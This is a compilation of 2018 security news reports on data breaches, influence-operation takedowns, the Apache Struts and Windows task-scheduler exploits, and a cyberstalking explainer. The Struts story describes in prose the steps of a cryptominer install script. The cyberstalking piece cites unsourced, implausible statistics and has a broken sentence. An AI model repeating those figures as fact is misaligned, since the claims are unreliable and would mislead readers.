Air Canada data breach – The incident was confirmed by the company and may have affected 20,000 customers (1%) of its 1.7 million mobile app users.
The data breach of the day is the one suffered by Air Canada that may have affected 20,000 customers (1%) of its 1.7 million mobile app users.

Air Canada confirmed the news, saying it had detected unusual login behaviour on its mobile app between Aug. 22 and 24, 2018. It added that financial data was protected but invited customers to remain vigilant for fraudulent credit card transactions.

“We detected unusual login behaviour with Air Canada’s mobile App between Aug. 22-24, 2018. We immediately took action to block these attempts and implemented additional protocols to protect against further unauthorized attempts. As an additional security precaution, we have locked all Air Canada mobile App accounts to protect our customers’ data.” reads the data breach notification.

“Your credit card information is protected. Credit cards that are saved to your profile are encrypted and stored in compliance with security standards set by the payment card industry or PCI standards. As a best practice, customers should always monitor their transactions and credit rating carefully and contact their financial services provider immediately if they become aware of any unusual or unauthorized activities.”

The company has asked Mobile+ app users to reset their accounts as a security precaution. Air Canada contacted potentially affected customers by email to notify the data breach.

Air Canada immediately took action to lock out unauthorized attempts and implemented additional security measures to protect its mobile users.

The most disconcerting aspect of the Air Canada data breach is that attackers may have accessed additional data, including customers’ passport number, passport expiration date, passport country of issuance and country of residence, Aeroplan number, known traveler number, NEXUS number, gender, date of birth, and nationality.

All this data could have been saved in the profile section of the Air Canada mobile app.

At this time the root cause of the Air Canada data breach is still unclear; the company urges users to reset their passwords.

All 1.7 million accounts have been temporarily locked until the customers change their passwords.

Twitter Suspends Accounts Engaged in Manipulation
29.8.2018 securityweek

Twitter this week announced the suspension of a total of 770 accounts for “engaging in coordinated manipulation.”

The suspensions were performed in two waves. One last week, when the social networking platform purged 284 accounts, many of which supposedly originated from Iran, and another this week, when 486 more accounts were kicked for the same reason.

“As with prior investigations, we are committed to engaging with other companies and relevant law enforcement entities. Our goal is to assist investigations into these activities and where possible, we will provide the public with transparency and context on our efforts,” Twitter noted last week.

The micro-blogging platform took action on the accounts after FireEye published a report detailing a large campaign conducted out of Iran focused on influencing the opinions of people in the United States and other countries around the world.

Active since at least 2017, the campaign focuses on anti-Israel, anti-Saudi, and pro-Palestine topics, but also included the distribution of stories regarding U.S. policies favorable to Iran, such as the Joint Comprehensive Plan of Action nuclear deal.

The report triggered reactions from large Internet companies, including Facebook and Google. The former removed 652 pages, groups, and accounts suspected of being tied to Russia and Iran, while the latter blocked 39 YouTube channels and disabled six Blogger and 13 Google+ accounts.

“Since our initial suspensions last Tuesday, we have continued our investigation, further building our understanding of these networks. In addition, we suspended an additional 486 accounts for violating the policies outlined last week. This brings the total suspended to 770,” Twitter said on Tuesday.

The social platform also revealed that fewer than 100 of the 770 suspended accounts claimed to be located in the United States, and many were sharing divisive social commentary. These accounts, however, had thousands of followers, on average.

“We identified one advertiser from the newly suspended set that ran $30 in ads in 2017. Those ads did not target the U.S. and the billing address was located outside of Iran. We remain engaged with law enforcement and our peer companies on this issue,” Twitter also said.

In June, Twitter announced a new process designed to improve the detection of spam accounts and bots and also revealed updates to its sign-up process to make it more difficult to register spam accounts. In early August, Duo Security announced a new tool capable of detecting large Twitter botnets.

Experts published a PoC code for Intel Management Engine JTAG flaw
29.8.2018 securityaffairs

A group of security researchers has published proof-of-concept exploit code for a vulnerability in the Intel Management Engine JTAG.
A team of security researchers has published proof-of-concept exploit code for a vulnerability in the Intel Management Engine JTAG.

Last year the same group of experts at Positive Technologies discovered an undocumented configuration setting that disabled the Intel Management Engine.

The Intel Management Engine consists of a microcontroller that works with the Platform Controller Hub chip in conjunction with integrated peripherals. It is a critical component that handles data exchanged between the processor and peripherals.

For this reason, security experts warned in the past of the risks for Intel Management Engine vulnerabilities. An attacker can exploit a flaw in the Intel ME to establish a backdoor on the affected system and gain full control over it.

The flaw was patched, but the team composed of Mark Ermolov, Maxim Goryachy, and Dmitry Sklyarov has devised a walkthrough for accessing the Joint Test Action Group (JTAG) feature implemented in the Intel Management Engine (IME).

The JTAG feature provides debugging access to the processor via special USB 3.0 debugging connectors.

“A special USB 3.0 debugging connector is also necessary, though those who enjoy hacking hardware can make their own by isolating the D+, D-, and Vcc contacts on a USB 3.0 Type A Male to Type A Male cable.” reported ElReg.

The PoC incorporates the work of Dmitry Sklyarov, another researcher from the company.

Exploiting the flaw is not simple: it requires physical access to the device via USB.

In May 2017, security experts discovered a critical remote code execution (RCE) vulnerability, tracked as CVE-2017-5689, in the remote management features implemented on computers shipped with Intel chipsets in the past 9 years.

The vulnerability affected the Intel Management Engine (ME) technologies such as Active Management Technology (AMT), Small Business Technology (SBT), and Intel Standard Manageability (ISM) and could be exploited by hackers to remotely take over the vulnerable systems.

The Electronic Frontier Foundation asked Intel to provide a way to disable the IME.

In August 2017, the experts from Positive Technologies (Dmitry Sklyarov, Mark Ermolov, and Maxim Goryachy) discovered a way to disable the Intel Management Engine 11 via an undocumented mode.

The researchers discovered that it is possible to turn off the Intel ME by setting the undocumented high assurance platform (HAP) bit to 1 in a configuration file.

The experts discovered that the security framework was developed by the US National Security Agency … yes the NSA!

In November Intel issued a security patch for the JTAG vulnerability (INTEL-SA-00086) and in February 2018 it issued a new update for the fix. The vulnerability allowed an attacker to execute arbitrary and unsigned code by using the PoC code to activate JTAG for the IME core.

The PoC was working on a Gigabyte Brix GP-BPCE-3350C (an Intel Celeron-based compact PC); the experts now note that it should also work on other Intel Apollo Lake-based PCs.

Exploiting the flaw also requires the matching TXE firmware version and a utility called Intel TXE System Tools, which is not publicly available and is provided only to some Intel OEM partners.

Cryptocurrency Platform Atlas Quantum hacked, 260k users impacted
29.8.2018 securityaffairs Cryptocurrency

The Cryptocurrency Platform Atlas Quantum suffered a security breach: information belonging to more than 260,000 users was stolen by hackers.
Hackers stole information related to over 260,000 users of the Cryptocurrency Platform Atlas Quantum. Exposed data includes customer names, phone numbers, and email addresses, as well as customer account balances.

The platform allows users to trade the cryptocurrency in their accounts on multiple platforms in a way to maximize the profits thanks to its automated arbitrage system.

Atlas has over 240,000 users and manages over $30 million in assets.

The company disclosed the security breach with a post on Facebook; it discovered the incident on Sunday evening. Atlas claims that hackers did not steal users’ funds and only compromised the platform database.

“We would like to point out that this is not a steal of bitcoins in custody or violation of our accounts in the exchanges. However, our customer base was exposed,” said Chief Executive Officer Rodrigo Marques in the Facebook post. “At the time of the incident, we took immediate steps to protect the database and passwords and private keys remain encrypted.”


The company said it has immediately adopted the necessary measures to protect the archive.

“At the time of the incident, we took immediate steps to protect the database and passwords and private keys remain encrypted,” states Atlas.

The company immediately launched an investigation, which is still ongoing, and temporarily disabled some features.

“Some features of the platform have been temporarily disabled, as a precaution, since we need to ensure security. We will notify you when they are reactivated,” Atlas added.

The popular cybersecurity expert Troy Hunt, who operates HaveIBeenPwned, announced that he has already added the breach to his data breach notification service (24% of the 261k records).

Users of the Cryptocurrency Platform Atlas Quantum can check whether their accounts and passwords have been compromised through the HaveIBeenPwned service.

The incident demonstrates that cryptocurrency marketplaces are becoming privileged targets for hackers.

The Rise of an Overlooked Crime – Cyberstalking
29.8.2018 securityaffairs Crime

Cyberstalking is one of the most overlooked crimes. This is exactly why it is among the fastest growing crimes in the world. Learn all there is about cyberstalking here.
The internet has been a blessing since its inception. The very concept of globalization has come into existence just because of the internet. The world that was previously unconnected soon became a global village with different cultures and traditions linking together via the information highway.

The internet brought with it plenty of benefits, but accompanying these benefits came some evils that were previously not known of. These evils include hacking, identity theft, online surveillance, and cyberstalking.

We all know the dangers associated with hacking, identity theft, and internet surveillance, thanks to Facebook and other social networking platforms. What we’re probably not aware of is cyberstalking, which is the most disgusting and dangerous of all these threats.

The Dangers of Cyberstalking
Most of us are already aware of what cyber stalking is or have encountered real-world stalking at some point in our lives. Women tend to have had more experiences than men. Stalking in its traditional sense refers to a situation where someone is keeping an eye on you without your will or interest. While this is enough to make someone uncomfortable, stalkers do so to know more about their victim so that they can use the learnt information to blackmail their victims or take advantage from them.

Cyberstalking is not too different, except that it’s more efficient than the traditional one. Because of the internet and all of its connectivity, stalkers do not need to follow you around the neighborhood. If you’re not too careful, they can learn everything there is to know about you, without even leaving their dimly lit basements.

They do this by following you on the internet. Because of social media, it’s not too difficult to follow you around. You probably post most of your daily activities on your social media profile. You check into places, post pictures while you’re there, tell people about the movie you recently watched, and share your current mood and feelings.

Why do people get targeted so easily?
All the personal information which is nowadays easily available on the internet can become the source of pleasure for any random cyber stalker. He can learn all there is to know about anyone in just a few clicks.

Most cyber stalkers are skilled hackers as well. They can hack into your social profiles and read your chats, and even post stuff from your profiles which can damage your reputation. Once an account gets compromised, finding pictures from chats, such as those that may have been shared with an intimate friend, is a cakewalk.

Similarly, these hackers can hack your devices too. This means that any private data saved on your phone can be seen and taken over by the hacker. They can even hack into your webcam and watch you live, without you knowing about it.

Today, modern technology has made it much easier for hackers and other cybercriminals to hide their tracks. With a specialized cyber security tool such as a VPN, anyone can become completely anonymous and invisible online, making it impossible for anyone to detect your presence or activities.

There are many other cybersecurity services that hackers and cyber criminals use for their unfair advantage. These include proxies and remote servers that allow hackers to keep bouncing their traffic on to different servers, thereby keeping them safe from getting detected.

While cyberstalking is an issue for all genders, women are the most affected. When cyber stalkers get their desired info, they use it to blackmail the victim and force them to do special favors. Some demand money, others demand more heinous things. And there’s no end to all this blackmailing. Those who are affected even turn towards suicide just to bring an end to all this creepiness and blackmailing.

According to some recent estimations, 94% of women who use the internet have faced cyberstalking at some point in their life. Moreover, 62% of all cyberstalking victims are young women between the age of 18 and 24.

Over 20,000 cyberstalking cases get reported each year and this number keeps growing every next year. We also know that there may be an equal number of cases which never get reported due to the taboos and stigmas attached with being a victim of cyber stalking. What’s worse is that cyberstalking has been on the rise for many years. says that, cyberstalking is the fastest growing crime and at least 1 million women are cyber-stalked in the US alone. According to a report by WHOA, 60% of all cyberstalking victims are women while 40% are teenage boys and adult males.

The following are a few examples of cyberstalkers who like to prey on the innocents:

Intimate partner stalkers
These are people who refuse to believe that their relationship no longer exists. Intimate partner stalkers are emotionally abusive people who want to control their partner despite the breakup. They continue to keep a constant eye on their separated partner and continue to make them feel extremely uncomfortable, violated, and scared.

Delusional stalkers
These are people who may suffer from major mental illnesses such as schizophrenia, manic-depression, or erotomania. They believe that the victim is in love with him/her and that they are in a relationship even though the victim has no clue about this imaginary relationship. Other delusional stalkers believe that if they pursue the person long enough, the victim would eventually give up and fall in love.

Vengeful stalkers
These people are motivated by vengeance. Vengeful stalkers have a cause to be angry with their victims. Vengeful stalkers are often targeted by members of their university or college faculty/staff. Some of these are psychopaths, while others are delusional and believe that they are the victims even though they’re not. Vengeful stalkers stalk to get even.

The Lack of Awareness…
What’s worse about cyberstalking is that there is virtually no awareness of it. Those who are affected by this issue do not know how to deal with it. This is because most victims prefer to stay quiet to save their name and their reputation. Others can’t even find the right platforms to raise their voice and find the right kind of help.

However, there are businesses and organizations that are standing up against cyberstalking and are using their resources and their knowledge to help the victims. Cyberstalking is a menace but it can be dealt with if proper precautions are followed. You can follow some important precautions mentioned here and stay safe from cyberstalking.

Lacework Raises $24 Million to Expand Cloud Security Business
29.8.2018 securityweek IT

Mountain View, Calif-based Lacework has closed a $24 million Series B funding round with Sutter Hill Ventures, bringing the total raised, including Series A early stage venture funding, to $32 million.

The company was founded in 2015 by Sanjay Kalra (chief strategy officer) and Vikram Kapoor (CTO). Stefan Dyckerhoff, MD at Sutter Hill Ventures, is CEO.

The new funding will be used to accelerate Lacework's sales and marketing efforts. "The product became available about a year ago," Dyckerhoff told SecurityWeek; "and with minimal sales and marketing we have achieved thirty happy customers with more in the pipeline. It's time to rev up our sales and marketing efforts."

Lacework is a SaaS platform designed to enable security in public cloud implementations "automatically, at speed, end-to-end, and with scale," he explained. "So, just like you're doing DevOps and automation on the development side in the public cloud, we think we have built a platform that can achieve the same thing on the security side while maintaining a very high degree of efficacy."

As soon as the product is deployed, it starts to automatically discover the customer's environment. It tells the customer what parts of the environment are in compliance and what is out of compliance. It detects things that shouldn't be happening, and helps the customer to remediate them.

It is not a complete security product in itself, but a platform that enables the customer to do security properly and at scale. For example, it doesn't operate like a CASB -- it doesn't locate rogue storage accounts operated by staff on shadow IT. It does, however, monitor and record everything that happens on the client's cloud account. "What we do see is misuse or rogue use of existing S3 buckets," explained Dyckerhoff.

Sometimes, this can include employees using what's available just because it's easy. "For example," he continued, "if developers know an account exists, would you really know if they fired up a new AWS Region in Japan over the weekend? The answer is probably 'no' -- unless you use a tool like Lacework."

Lacework sees everything that happens within the cloud account. "We have found attacks in this same category," said Dyckerhoff. "We detected live instances of bitcoin mining in one of our customers where the compromised credential of a developer was used to fire up a different Region to do bitcoin mining. With conventional tools there would have been no way to catch that. So, we don't help with small accounts set up by the employee with his own funds; but for misuse of the corporate account, we absolutely catch everything."

It is the ability to see everything that happens that gives Lacework the capacity to monitor compliance. Where regulations are mature -- such as PCI and HIPAA -- it is able to deliver traffic-light compliance reports immediately. GDPR is a little different because the regulation is so new and enforcement practices are still unknown. Nevertheless, Lacework's ability to continuously monitor the entire cloud account can highlight moments when the company does, or is in danger of, slipping out of GDPR compliance.

"Right now," he suggests, "the key questions for GDPR compliance are 'where is my data?' and 'who accessed it?'. These are questions that can absolutely be answered by Lacework."

Assuming the company knows where its GDPR-sensitive data is stored, Lacework will discover every API call made within the account. "We know every S3 bucket and which API called it," explained Dyckerhoff. "We keep that data over time. But we also map out the applications. So, once we are fully deployed we will know exactly which process talked to which other process, how that relates to an API call, and whether it resulted in an S3 transaction or a network transaction."

The customer gets all these records, and can see if there is an API call to a location storing EU PII that did not come from another EU location. "For GDPR," he continued, "you must not miss a single transaction -- and that's what we provide. The customer still needs to know what is his GDPR data and where it is stored; but from then on, we can show all legitimate and illegitimate access to that data, demonstrating whether his storage data is in compliance or out of compliance with GDPR."

Dyckerhoff believes that the cloud marketplace is accelerating rapidly. "Over the last 12 months," he said, "cloud has progressed from early adopters to early mainstream adopters. A better understanding of the 'shared responsibility' security model is emerging. Our platform assumes the cloud is there. We have all the APIs and data sources that allow us to do automated discovery and analysis and gives the customer the tools to use the cloud securely.

"The cloud is certainly no less secure than on-prem; but it's very different. The cloud is secure if you make it secure; but you have to think about it in a new way. Lacework helps to do that."

In May 2018, Gartner included Lacework in its '5 Gartner Cool Vendors in Cloud Security -- 2018.' It said, "Lacework addresses the challenges enterprises face via their Polygraph technology. Polygraph combines cloud resource monitoring, data collection and correlation, and strong visualization. Lacework also provides threat insights into cloud environments as well as security automation tools."

Critical Apache Struts Vulnerability Exploited in Live Attacks
29.8.2018 securityweek

A critical remote code execution vulnerability in Apache Struts 2 that was patched last week is already being abused in malicious attacks, threat intelligence firm Volexity warns.

The flaw affects Struts 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the framework.

Tracked as CVE-2018-11776, the bug is rather trivial to exploit: because Apache Struts doesn’t properly validate namespace input data, an attacker would only need to insert their own namespace as a parameter in an HTTP request.

Neither the Apache Software Foundation – which announced the availability of patches on August 22 – nor Semmle – the code analysis company that reported the bug in April – provided technical details, but a proof-of-concept (PoC) exploit for the vulnerability was published within days.

Now, Volexity says they have observed the first malicious campaign targeting the vulnerability. The attacks apparently started shortly after the PoC was released.

“Volexity has observed at least one threat actor attempting to exploit CVE-2018-11776 en masse in order to install the CNRig cryptocurrency miner. The initial observed scanning originated from the Russian and French IP addresses and,” the security firm reveals.

The observed exploit attempts to retrieve a copy of CNRig Miner from Github (saves it as xrig) and a shell script from BitBucket by performing wget requests to the URLs the two pieces of code reside at.

Among other actions, the shell script removes specific processes, deletes previous instances of the miner, and downloads three ELF cryptomining binaries. These are miner executables targeting Intel, ARM, and MIPS architectures, which shows the broad scope of the attack.

“[I]t shows the miner is capable of running across a wide range of hardware, such as servers, desktops, laptops, IOT devices, wireless routers, and more — nearly any internet connected device running a vulnerable instance of Apache Struts,” Volexity points out.

The BitBucket folder appears to be an open directory that contains both the shell script and the ELF binaries. The mining account name is the same as the BitBucket account name, the security firm says.

Apache Struts framework’s popularity makes it a highly appealing target to cybercriminals and threat actors alike, and it’s no surprise that the recently addressed bug is already being abused for malicious purposes.

A critical remote code execution flaw addressed in the framework in March 2017 was still being targeted one year later, SANS Internet Storm Center handler Guy Bruneau reported several months ago.

Hackers Breach Cryptocurrency Platform Atlas Quantum
29.8.2018 securityweek Cryptocurrency

260,000 Impacted in Cryptocurrency Investment Platform Breach

The information of over 260,000 users was stolen after hackers managed to compromise the cryptocurrency investment platform Atlas Quantum.

Through this platform, users can add Bitcoin to their accounts and make profits by trading the cryptocurrency on various platforms. Atlas says it uses an automated arbitrage system to yield profits for customers based on real-time movements in the cryptocurrency market.

The company says it has over 240,000 users in more than 50 countries and over $30 million in assets under its management. In 2017, the platform delivered a cumulative 38% return to investors, Atlas claims.

In an announcement made on Facebook, the company revealed that it became aware of a data breach on Sunday evening and that, although no funds were stolen, its customer database was compromised.

According to a tweet from HaveIBeenPwned, the service that allows users to check whether their accounts and passwords have appeared in any data breaches, the stolen data set had over 261,000 entries.

The leaked information apparently includes affected individuals’ names, phone numbers, and email addresses, as well as their account balances.

“At the time of the incident, we took immediate steps to protect the database and passwords and private keys remain encrypted,” Atlas says.

The investigation into the incident is ongoing, but the company also notes that, in addition to monitoring the affected accounts, they are working to add more protections against fraud.

“Some features of the platform have been temporarily disabled, as a precaution, since we need to ensure security. We will notify you when they are reactivated,” Atlas says.

“The Atlas Quantum data breach suggests that crypto services remain a high-profile target for hackers. Even those who do not actively use the platform to store or invest in crypto may have had their personal data exposed,” Bitglass CTO Anurag Kahol told SecurityWeek in an emailed comment.

“For companies like Atlas, that store mass amounts of user data, reputation and user data security are closely tied. Quickly identifying the cause of this breach and mitigating the threat of further data loss is a critical next step for Atlas and prevention should be top of mind for all companies that store high-value data,” Kahol continued.

The incident should be a wakeup call for cryptocurrency platforms, which are increasingly targeted by cybercriminals, Jonathan Bensen, Director of Product Management/ Acting CISO, Balbix, pointed out to SecurityWeek in an emailed commentary.

Man Accused of Hacking Into Bank Account, Stealing $300,000
29.8.2018 securityweek Hacking

HARTFORD, Conn. (AP) — Police have arrested a Connecticut man they allege hacked into someone's retirement account and stole more than $300,000.

Hartford police say 36-year-old Kwadjo Osei-Wusu, of Manchester, was arrested Friday and charged with money laundering, larceny and conspiracy to commit identity theft.

Police say the FBI began investigating fraudulent activity on the Wells Fargo account in March.

Authorities say the account was compromised in 2014, and more than $300,000 was stolen and then deposited in several fraudulent bank accounts.

The stolen funds were then withdrawn as cashier checks, cashed and turned over to Osei-Wusu.

Police say the scheme involved "sophisticated levels of cyber hacking."

Osei-Wusu was held on $450,000 bond pending a Tuesday court appearance and could not be reached. No attorney was listed for him in online judicial records.

Industrial Cybersecurity Firm Indegy Raises $18 Million
29.8.2018 securityweek ICS

Industrial cybersecurity firm Indegy on Tuesday announced that it has raised $18 million through a Series B funding round, bringing the total amount raised by the company to $36 million. The new funding adds to a $12 million Series A round announced by the company in July 2016.

Indegy offers a platform that protects industrial control systems (ICS) from cyber, insider and operator error (non-malicious intent) threats, by providing visibility into ICS networks and identifying changes to controllers that could indicate an attack, including changes to firmware, logic, and configuration updates.

"This capital infusion provides the financial resources required to scale up the company and capitalize on this market opportunity," said Barak Perelman, CEO of Indegy.

Indegy Exhibits at SecurityWeek's 2017 ICS Cyber Security Conference in Atlanta (Image Credit: SecurityWeek)
In May, the company launched a risk assessment service designed to help organizations evaluate exposures in their operational technology (OT) environments.

In addition to announcing its Series B financing, the company announced the appointment of two new executives to its management team: Joe Scotto as Chief Marketing Officer, who joined from BAE Systems, and former Imperva executive, Todd Warwick, who will serve as VP of Sales for the Americas.

The Series B round was led by Liberty Technology Venture Capital, with participation from energy and services firm Centrica plc, O.G. Tech Ventures and existing investors Shlomo Kramer, Magma Venture Partners, Vertex Ventures and Aspect Ventures.

Perelman will be presenting on addressing insider threats in OT environments at SecurityWeek’s 2018 ICS Cyber Security Conference in October.

Indegy is one of several security startups targeting the industrial space that have recently raised funding. Others include Nozomi Networks, Dragos, Bayshore Networks, CyberX, Claroty, and SCADAFence. Veteran industrial software firm PAS raised $40 million in April 2017. Darktrace, which has an offering targeted to the industrial sector, raised $75 million at a valuation of $825 million in July 2017.

Telegram Says to Cooperate in Terror Probes, Except in Russia
29.8.2018 securityweek Social BigBrothers

The Telegram encrypted messenger app said Tuesday it would cooperate with investigators in terror probes when ordered by courts, except in Russia, where it is locked in an ongoing battle with authorities.

The company founded by Russian Pavel Durov has refused to provide authorities in the country with a way to read its communications and was banned by a Moscow court in April as a result.

But in its updated privacy settings, Telegram said it would disclose its users' data to "the relevant authorities" elsewhere if it receives a court order to do so, although not in Russia.

"If Telegram receives a court order that confirms you're a terror suspect, we may disclose your IP address and phone number to the relevant authorities," Telegram's new privacy settings said.

"So far, this has never happened. When it does, we will include it in a semiannual transparency report," the app added.

Durov said the new privacy terms were adopted to "comply with new European laws on protecting private data."

But Durov assured his Russian users that Telegram would continue to withhold their data from security services.

"In Russia, Telegram is asked to disclose not the phone numbers or IP addresses of terrorists based on a court decision, but access to the messages of all users," he wrote on his Telegram channel.

He added that since Telegram is illegal in Russia, "we do not consider the request of Russian secret services and our confidentiality policy does not affect the situation in Russia."

Durov has long said he would reject any attempt by the country's security services to gain backdoor access to the app.

Telegram lets people exchange messages, stickers, photos and videos in groups of up to 5,000 people. It has attracted more than 200 million users since its launch by Durov and his brother Nikolai in 2013.

Russia has acted to curb internet freedoms as social media has become the main way to organise demonstrations.

Authorities stepped up the heat on popular websites after Vladimir Putin started his fourth Kremlin term in 2012, ostensibly to fight terrorism but analysts say the real motive was to muzzle Kremlin critics.

According to the independent rights group Agora, 43 people were given prison terms for internet posts in Russia in 2017.

Tech companies have had difficulty balancing the privacy of users against law enforcement, with encryption of communications adding a layer of complexity to cooperating with authorities.

One of Telegram's rival apps, Facebook-owned WhatsApp, says it complies with authorities in accordance with "applicable law".

Critical Apache Struts flaw CVE-2018-11776 exploited in attacks in the wild
29.8.2018 securityaffairs

According to the threat intelligence firm Volexity, the CVE-2018-11776 vulnerability is already being abused in malicious attacks in the wild.
Just yesterday I wrote about the public availability of exploit code for the recently disclosed critical remote code execution vulnerability CVE-2018-11776 in Apache Struts 2.

The PoC code was published on GitHub and experts were warning of the risks of massive attacks.

The CVE-2018-11776 vulnerability affects Struts versions from 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the framework.

Struts 2.3.35 and 2.5.17 include the security updates that address CVE-2018-11776.

Struts developers also published a temporary workaround, but they recommend installing the updates rather than relying on it.

News of the day is that according to the threat intelligence firm Volexity, the flaw is already being abused in malicious attacks.

The vulnerability is trivial to exploit: the RCE can be triggered when no namespace value is set for a result defined in the underlying XML configuration and, at the same time, the enclosing action configuration has no namespace or a wildcard namespace.

According to the experts from the threat intelligence firm Recorded Future, there is an intense activity related to the Struts flaw in a number of Chinese and Russian underground forums.

“Unfortunately, this makes the vulnerability trivial to exploit — in fact, proof-of-concept code has already been released, including a Python script that allows for easy exploitation. Recorded Future has also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability.” reads the analysis published by Recorded Future.

“Unlike last year’s Apache Struts exploit (CVE-2017-5638), which was at the center of the Equifax breach, this vulnerability appears easier to exploit because it does not require the Apache Struts installation to have any additional plugins running in order to successfully exploit it.”

Experts warn that CVE-2018-11776 is easier to exploit than CVE-2017-5638, the Apache Struts flaw that was exploited in the Equifax hack.

The number of potentially vulnerable applications is likely very large.

Volexity researchers say they observed the first malicious campaign targeting the vulnerability shortly after the PoC was published online.

Threat actors are leveraging the flaw in an attempt to install the CNRig cryptocurrency miner.

“Volexity has observed at least one threat actor attempting to exploit CVE-2018-11776 en masse in order to install the CNRig cryptocurrency miner.” states the report published by Volexity.

“The initial observed scanning originated from the Russian and French IP addresses and,”

The exploit used in the attacks fetches a copy of the CNRig miner from GitHub (saving it as xrig) and a shell script from BitBucket, using wget requests to the URLs where the two files are hosted.

The shell script removes previous instances of the miner, kills specific processes, and downloads three ELF cryptomining binaries.

The script performs the following actions:

Kill any processes whose name contains the keyword rabbit.
Look for processes whose name contains the keyword check and kill them unless they are the current process.
Remove any running instances of the miner (xrig).
Download three ELF cryptomining binaries, chmod them, execute them, and then delete the files.
Remove nohup.out.
Sleep for ten minutes (600 seconds).

The miners observed in this campaign target multiple architectures, including Intel, ARM, and MIPS.

“The three ELF binaries downloaded are executables for the Intel, ARM, and MIPS architectures. This is worth noting, as it shows the miner is capable of running across a wide range of hardware, such as servers, desktops, laptops, IOT devices, wireless routers, and more — nearly any internet connected device running a vulnerable instance of Apache Struts.” continues the report from Volexity.

The BitBucket folder involved in the attack contains both the shell script and the ELF binaries. Researchers observed that the mining account name is the same as the BitBucket account name.

I have no doubt that the number of campaigns targeting CVE-2018-11776 will rapidly increase: a large number of unpatched Apache Struts 2 installs are still exposed online.

Expert publicly disclosed exploit code for Windows Task Scheduler Zero-Day
29.8.2018 securityaffairs
Exploit Vulnerability

A security researcher has publicly disclosed the details of a zero-day privilege escalation vulnerability affecting Microsoft's Windows operating systems.
The researcher behind the Twitter account @SandboxEscaper disclosed a zero-day privilege escalation flaw in Windows that a local attacker or malicious program could exploit to obtain SYSTEM privileges on a vulnerable machine.

Here is the alpc bug as 0day: … I don't fucking care about life anymore. Neither do I ever again want to submit to MSFT anyway. Fuck all of this shit.

7:07 PM - Aug 27, 2018

According to the expert who disclosed the flaw, the issue also affects a “fully-patched 64-bit Windows 10 system.”

The vulnerability resides in the Windows’ task scheduler program and ties to errors in the handling of Advanced Local Procedure Call (ALPC) systems.

The Advanced Local Procedure Call (ALPC) is an undocumented Inter-Process Communication facility provided by the Microsoft Windows kernel for lightweight (or local) Inter-Process Communication (IPC) between processes on the same computer.

The Advanced local procedure improves high-speed and secure data transfer between one or more processes in the user mode.

SandboxEscaper posted a proof-of-concept (PoC) exploit code for the zero-day that was published on GitHub.

The vulnerability was verified by CERT/CC analyst Will Dormann, who posted the following message:

Will Dormann
I've confirmed that this works well in a fully-patched 64-bit Windows 10 system.
LPE right to SYSTEM!

12:08 AM - Aug 28, 2018
The CERT/CC published a security advisory explaining that the flaw could be exploited by a local user to obtain elevated (SYSTEM) privileges.

“Microsoft Windows task scheduler contains a vulnerability in the handling of ALPC, which can allow a local user to gain SYSTEM privileges. We have confirmed that the public exploit code works on 64-bit Windows 10 and Windows Server 2016 systems. Compatibility with other Windows versions may be possible with modification of the publicly-available exploit source code” reads the alert issued by the CERT/CC.

The flaw received a CVSS score of 6.4 to 6.8.
The CERT/CC confirmed that there is currently no workaround. Because ALPC is a local interface, the bug can only be exploited by code that is already running on the target, which limits its impact; the real risk is malware bundling the PoC to escalate from a user account to SYSTEM on Windows systems.

SandboxEscaper did not report the zero-day to Microsoft, so affected Windows systems remain vulnerable until the company releases security updates.

At the time of writing it is still unclear whether the Windows zero-day affects all supported Windows versions; some experts, in fact, report that the PoC code doesn't work on Windows 7.

Microsoft is expected to address the vulnerability with its September Patch Tuesday updates, scheduled for September 11.

Notorious Cybercriminal Released From Prison
29.8.2018 securityweek CyberCrime

Earlier this month, Belarusian authorities released from prison Sergey Yarets, a notorious cybercriminal and co-developer of the Andromeda botnet.

Yarets, who used the online moniker of Ar3s, was arrested in late November 2017, when Federal Bureau of Investigation (FBI) and law enforcement agencies in Europe dismantled the Andromeda botnet.

Also known as Gamarue or Wauchos, Andromeda has been around since 2011, its primary purpose being that of credential theft and malware distribution. Detected on over 1 million machines each month during the second half of 2017, the botnet had been associated with 80 malware families.

At the time of takedown, security researchers identified 464 distinct Andromeda botnets and 1,214 domains and IP addresses of command and control (C&C) servers. In January this year, ESET warned of difficult cleaning efforts for such a long-lived botnet and said Andromeda would die a slow death.

Despite Andromeda’s size (victims were identified in over 200 countries) and the considerable effort international law enforcement agencies and private organizations put into taking it down, Yarets was released on August 9, 2018.

When arrested, Yarets was charged for his involvement in the sale, maintenance, and use of Andromeda. A resident of Rechitsa, Gomel Region, Belarus, he was formerly a technical director at OJSC “Televid” Tele-Radio, threat intelligence provider Recorded Future reveals.

Opposition news agency Radio Svaboda, the only Belarusian media outlet to have reported the release, says that Yarets was ordered to pay $5,500 as retribution for the income made from the botnet, and that his apparent cooperation with the authorities was what led to his quick release.

As per Radio Svaboda Belarus’ reporting, Yarets’s lawyer “elaborated that Yarets’s extraordinary knowledge should serve the country’s interests and that there was no evidence of damage done to Belarusian citizens or organizations because Yarets did not target member countries of the Commonwealth of Independent States,” Recorded Future notes.

Yarets apparently claimed that Andromeda was created by a “genius and alcoholic” developer, supposedly the Russian threat actor waahoo. Yarets claims he received the exclusive rights of the Andromeda Trojan in 2012.

Although waahoo apparently continued to be involved in the Trojan’s development until approximately 2015, Yarets was the only one responsible for Andromeda’s operation at the time of his arrest.

“The Belarusian investigators and judges most likely knew this but did not take it into account for unknown reasons,” Recorded Future notes.

“This case is an example of a selective approach toward the punishment of cybercriminals in ex-Soviet states, allowing them to avoid just punishment when states are interested in them, diminishing the importance and efficiency of international cooperation in this field,” the security firm concludes.

Iranian Hackers Target Universities in Large Attack Campaign: SecureWorks
29.8.2018 securityweek Cyber

SecureWorks security researchers have discovered that a new, large phishing campaign targeting universities is similar to previous cyber operations by an actor associated with the Iranian government.

The campaign involved the use of sixteen domains that contained more than 300 spoofed websites and login pages for 76 universities in 14 countries, including Australia, Canada, China, Israel, Japan, Switzerland, Turkey, the United Kingdom, and the United States.

Many of the spoofed domains, SecureWorks says, referenced the targeted universities’ online library systems, suggesting that the actors behind the campaign were interested in accessing those resources. Not all domains were accessible during analysis.

Victims who entered their login credentials into the fake login pages were redirected to the legitimate websites. Once there, they were either automatically logged into a valid session or asked for the login credentials again, SecureWorks explains.

Many of the domains were registered between May and August 2018, the most recent of them on August 19. Most of the identified domains resolved to the same IP address and DNS name server.

